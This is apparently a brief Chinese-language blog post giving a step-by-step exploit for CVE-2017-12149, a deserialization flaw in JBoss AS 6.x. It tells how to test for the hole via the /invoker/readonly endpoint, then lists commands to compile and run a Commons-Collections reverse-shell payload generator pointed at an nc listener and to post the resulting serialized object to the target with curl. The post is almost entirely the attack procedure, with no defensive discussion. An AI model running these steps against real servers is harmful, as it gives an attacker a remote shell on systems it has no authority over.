3Years - TotoroLMva 浪迹在上海的信息安全大学狗 我信仰的是信仰

11月 30

CVE-2017-12149 JBOSSAS6.X 反序列化漏洞

POC文件下载
URL后面拼接

/invoker/readonly/

来判断漏洞是否存在、如果报500便是存在。

步骤1:

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

步骤2:

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port (nc监听IP及端口)

步骤3

curl http://xxxxx:81/invoker/readonly –data-binary @ReverseShellCommonsCollectionsHashMap.ser

标签:none

还不快抢沙发

添加新评论